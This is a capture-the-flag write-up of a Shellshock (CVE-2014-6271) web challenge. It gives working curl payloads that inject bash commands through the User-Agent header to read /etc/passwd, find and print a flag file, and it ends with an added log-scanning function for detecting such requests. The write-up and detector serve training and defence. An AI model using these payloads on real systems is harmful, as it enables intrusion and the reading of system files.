What a cute dog! [Web – 350 Points] - RITSEC CTF

Challenge description

This dog is shockingly cute!

fun.ritsec.club:8008

Author: sandw1ch

OK, let's check the URL and view the source code.

/cgi-bin/stats. OK, I tried searching Google for “/cgi-bin/stats”.

It's CVE-2014-6271. Time to exploit.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://fun.ritsec.club:8008/cgi-bin/stats

Find the flag with this command.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / -name flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats

And then read the flag.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /opt/flag.txt;'" http://fun.ritsec.club:8008/cgi-bin/stats

The flag is

RITSEC{sh3ll_sh0cked_w0wz3rs}
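
What these requests look like from the server side, as an added example (not part of the original writeup): a POSIX shell function that scans a combined-format access log for Referer or User-Agent values beginning with the bash function-definition marker `() {`, which is what CVE-2014-6271 requests carry. The log lines, IP addresses and the names `sample_log` and `find_shellshock` are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag access-log entries whose Referer or User-Agent value
# starts with "() {" (optional whitespace allowed), the marker of
# CVE-2014-6271 requests against CGI endpoints.

# Constructed sample log (combined format, documentation IP ranges).
sample_log() {
cat <<'EOF'
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 312 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 1540 "-" "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/stats HTTP/1.1" 200 98 "() { :;}; /usr/bin/id" "curl/7.61.0"
203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "notes on () { syntax"
EOF
}

# Reads a combined-format log on stdin.
# Prints "<client-ip> <request-path> <header-name>" for every suspicious header.
find_shellshock() {
    awk -F'"' '
    {
        # Splitting on double quotes: $2 = request line, $4 = Referer, $6 = User-Agent
        split($1, pre, " ")
        split($2, req, " ")
        for (i = 4; i <= 6; i += 2) {
            # Only a value that BEGINS with "() {" is treated by a vulnerable
            # bash as a function definition, so anchor the match at the start.
            if ($i ~ /^[ \t]*[(][)][ \t]*[{]/) {
                name = (i == 4) ? "referer" : "user-agent"
                printf "%s %s %s\n", pre[1], req[2], name
            }
        }
    }'
}

# Stand-alone run over the constructed sample.
sample_log | find_shellshock
```

A hit against a `/cgi-bin/` path with a 200 response and an unusually large body is worth following up; the fix itself is a patched bash on the host.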

Thanks for reading.